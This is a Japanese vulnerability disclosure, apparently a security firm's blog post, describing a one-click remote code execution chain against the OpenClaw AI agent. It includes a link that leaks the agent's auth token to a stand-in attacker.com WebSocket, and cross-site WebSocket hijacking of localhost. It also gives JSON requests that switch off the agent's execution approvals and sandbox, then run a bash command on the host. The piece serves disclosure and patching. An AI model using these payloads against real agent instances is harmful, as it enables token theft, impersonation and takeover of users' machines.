RCE をクリックすると、Moltbot のデータやキーが盗まれます。

テック界で最も注目されるエージェント、OpenClaw（旧 Moltbot & ClawdBot）をハッキングする方法
自分の代わりに行動できるオープンソースAIパーソナルアシスタントは現在X上で最も話題になっているテーマです。iMessage/WhatsApp/Slack へのアクセスから、ローカルコンピュータを無制限に操作するまで、10万件以上の開発者がデジタルライフの鍵として信頼しています。

エージェントが「ゴッドモード」権限を取得すると、ミスの余地はゼロになります。コミュニティはその機能を祝福しつつ、depthfirst の一般セキュリティインテリジェンスチームはこっそりコードを監査し、重大な脆弱性を発見しました。私はこの指摘を調査し、さらに別の欠陥と組み合わせて 1‑クリックでリモートコード実行（RCE）できるエクスプロイトを作成しました。悪意あるウェブページにアクセスするだけで、あなたのコンピュータ および AI アシスタントを同時にハックできます。

以下では、depthfirst が明らかにしたロジック欠陥と、それを武器化するために構築した正確なキルチェーンを解説します。

---

depthfirst が脆弱性を指摘した経緯

1. インジェスト
   

   app-settings.ts

   は URL のクエリパラメータとして渡された

   gatewayUrl

   をそのまま受け取り、ストレージに永続化します。

   const gatewayUrlRaw = params.get("gatewayUrl");
   if (gatewayUrlRaw != null) {
     const gatewayUrl = gatewayUrlRaw.trim();
     if (gatewayUrl && gatewayUrl !== host.settings.gatewayUrl) {
       applySettings(host, { ...host.settings, gatewayUrl }); // saveSettings → localStorage で永続化
     }
   }
   

2. 処理
   

   app-lifecycle.ts

   は設定が適用された直後に

   connectGateway()

   を呼び出します。

   handleConnected(host) {
     …
     connectGateway(host); // URL パラメータ解析後すぐに実行
     startNodesPolling(host);
     …
   }
   

3. プロトコル実行
   

   gateway.ts

   は認証トークンを自動的に新しいゲートウェイへの接続ハンドシェイクにバンドルします。

   const params = { /* … */, authToken, locale: navigator.language };
   void this.request<GatewayHelloOk>("connect", params);
   

それぞれは単独では安全ですが、組み合わせると「URL をクリックするだけで接続を強制し、認証トークンを漏洩させる」という重大なセキュリティ問題が発生します。depthfirst の UI プレビューには次のように記載されています。

1‑Click RCE エクスプロイト キルチェーン
限定的直接攻撃

---

限定的直接攻撃

エクスプロイト手順は以下です：

1. 被害者が悪意あるリンクをクリック（またはリダイレクト）します。例：
   

   http://victim_openclaw.com?gatewayUrl=ws://attacker.com:8080

   。
2. 攻撃者の WebSocket サーバーが認証トークンを受信します。
3. 攻撃者は盗まれたトークンで被害者の OpenClaw インスタンスにログインします。

攻撃者は個人データへアクセスし、被害者になりすまして行動（テキストメッセージ閲覧、Stripe API キー取得等）を実行できます。

制限事項

• ローカルで稼働している OpenClaw インスタンスには作用しません。
• 防御サンドボックスや安全ガードレールはバイパスできません。
• 任意コード実行は達成できません。

---

制限を克服する手段

1. localhost ネットワーク制限の回避

ほとんどのユーザーは

localhost

上で OpenClaw を動かします。正しい認証トークンがあっても、Same Origin Policy（SOP）のために攻撃者はアクセスできません。ただし：

• ブラウザは HTTP 接続には SOP を適用する一方、WebSocket には適用しない。
• OpenClaw の WebSocket サーバーは

  Origin

  ヘッダーを検証せず、任意のサイトからのリクエストを受け入れます。

これにより クロスサイト WebSocket ハイジャック（CSWSH） が可能になります。
被害者が

attacker.com

を訪れると、ブラウザ内で JavaScript を実行し

ws://localhost:18789

へ接続します。ブラウザは

attacker.com

とローカル OpenClaw の間のピボットとなります。

2. サンドボックスからの脱出

OpenClaw の安全機能（例：

exec-approvals.json

、コンテナ化されたシェルツール）は API を介して制御されます。盗まれたトークンは

operator.admin

と

operator.approvals

スコープを付与し、次の操作が可能になります：

• ユーザー確認を無効化 –

  exec.approvals.set

  リクエストで

  ask: "off"

  を設定。

  {
    "method": "exec.approvals.set",
    "params": { "defaults": { "security": "full", "ask": "off" } }
  }
  

• コンテナを無効化 –

  config.patch

  リクエストで

  tools.exec.host

  を

  "gateway"

  に設定し、コマンドをホスト上で直接実行。

3. 任意コマンド実行

最後に

node.invoke

リクエストを送信します：

{
  "type": "req",
  "id": "4",
  "method": "node.invoke",
  "params": {
    "nodeId": "main",
    "command": "system.run",
    "params": { "cmd": "bash -c 'echo hacked > /tmp/hacked'" },
    "timeoutMs": 60000,
    "idempotencyKey": "rev1"
  }
}

これらはすべて、被害者が悪意あるページにアクセスしてから数ミリ秒で完了します。入力やプロンプトは不要です。

---

開示とパッチ

OpenClaw チームは私の報告を受けて迅速に問題を修正しました。GitHub Advisory には次のように記載されています：

• ゲートウェイ URL 確認モーダルが追加され、プロンプトなしで自動接続する挙動が排除されました。

• v2026.1.24-1

  以前のすべてのバージョンが脆弱です。

OpenClaw をアップグレードし、トークンが漏洩している可能性がある場合はローテーションを行ってください。

---

最後に

depthfirst は攻撃者が発見する前に論理欠陥を検出するインテリジェンス層を構築しています。コードを公開しているなら、ぜひご相談ください。